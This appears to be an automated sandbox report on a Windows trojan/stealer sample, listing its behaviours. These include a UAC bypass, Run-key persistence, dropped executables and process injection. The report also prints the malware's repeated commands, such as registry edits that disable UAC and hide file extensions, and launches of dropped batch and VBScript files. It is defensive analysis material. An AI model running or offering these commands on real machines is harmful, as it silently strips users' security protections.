Malware Analysis Report

2025-08-10 23:07

Sample ID 220210-hn9lasfgel
Target v4vcmk.exe
SHA256 fa5e38ff3f546827c5e62db27f12d68bcc4cb30285a329088c54995b2e4ec5d0
Tags
evasion persistence trojan spyware stealer
score
10/10

Analysis Overview

score
10/10

SHA256

fa5e38ff3f546827c5e62db27f12d68bcc4cb30285a329088c54995b2e4ec5d0

Threat Level: Known bad

The file v4vcmk.exe was found to be: Known bad.

Malicious Activity Summary

evasion persistence trojan spyware stealer

Modifies visibility of file extensions in Explorer

Suspicious use of NtCreateProcessExOtherParentProcess

UAC bypass

Executes dropped EXE

Blocklisted process makes network request

Reads user/profile data of web browsers

Checks computer location settings

Loads dropped DLL

Checks whether UAC is enabled

Adds Run key to start application

Drops file in Windows directory

Enumerates physical storage devices

Program crash

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

System policy modification

Modifies registry key

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-02-10 06:54

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-02-10 06:54

Reported

2022-02-10 06:57

Platform

win10v2004-en-20220113

Max time kernel

168s

Max time network

167s

Command Line

"C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe"

Signatures

Modifies visibility of file extensions in Explorer

evasion

Suspicious use of NtCreateProcessExOtherParentProcess

Description Indicator Process Target
PID 3868 created 4836 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\IGMkwoUM\ecEsQUkU.exe
PID 2432 created 3520 N/A C:\Windows\SysWOW64\WerFault.exe C:\ProgramData\QAMQQckI\QMYUIoMs.exe

UAC bypass

evasion trojan

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\fSgEsIQI\dAkcYIYg.exe N/A
N/A N/A C:\ProgramData\WwgMQcMw\LyocAoAM.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dAkcYIYg.exe = "C:\\Users\\Admin\\fSgEsIQI\\dAkcYIYg.exe" C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dAkcYIYg.exe = "C:\\Users\\Admin\\fSgEsIQI\\dAkcYIYg.exe" C:\Users\Admin\fSgEsIQI\dAkcYIYg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\LyocAoAM.exe = "C:\\ProgramData\\WwgMQcMw\\LyocAoAM.exe" C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\LyocAoAM.exe = "C:\\ProgramData\\WwgMQcMw\\LyocAoAM.exe" C:\ProgramData\WwgMQcMw\LyocAoAM.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ecEsQUkU.exe = "C:\\Users\\Admin\\IGMkwoUM\\ecEsQUkU.exe" C:\Windows\System32\Conhost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\QMYUIoMs.exe = "C:\\ProgramData\\QAMQQckI\\QMYUIoMs.exe" C:\Windows\System32\Conhost.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\SysWOW64\cmd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\cmd.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\WinSxS\pending.xml N/A N/A
File opened for modification C:\Windows\Logs\CBS\CBS.log N/A N/A
File opened for modification C:\Windows\WindowsUpdate.log C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log C:\Windows\system32\svchost.exe N/A
File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp C:\Windows\SysWOW64\WerFault.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2644 wrote to memory of 3404 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Users\Admin\fSgEsIQI\dAkcYIYg.exe
PID 2644 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\ProgramData\WwgMQcMw\LyocAoAM.exe
PID 2644 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 2644 wrote to memory of 3932 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 2644 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1068 wrote to memory of 1656 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe
PID 1996 wrote to memory of 4292 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1656 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 4008 wrote to memory of 1252 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe
PID 1656 wrote to memory of 3808 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1656 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1656 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1656 wrote to memory of 2228 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 2228 wrote to memory of 2420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1252 wrote to memory of 3212 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1252 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1252 wrote to memory of 740 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1252 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1252 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 3212 wrote to memory of 4044 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

System policy modification

evasion
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System C:\Windows\SysWOW64\cmd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\cmd.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

"C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe"

C:\Users\Admin\fSgEsIQI\dAkcYIYg.exe

"C:\Users\Admin\fSgEsIQI\dAkcYIYg.exe"

C:\ProgramData\WwgMQcMw\LyocAoAM.exe

"C:\ProgramData\WwgMQcMw\LyocAoAM.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eewUwIAg.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KmEMMMck.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oiUcsAoE.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\buskYcUk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zMEQogAA.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bcQoEgII.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ncIgIoUw.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HaIYwMoI.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VSYAEMQM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pooUoUQI.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QCgIAsYA.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KwcAQkMA.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KYEkMowQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WuIYEEIY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OQUEQUwg.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AsIMYIoI.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lmQkwEsU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZsYEsEkg.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

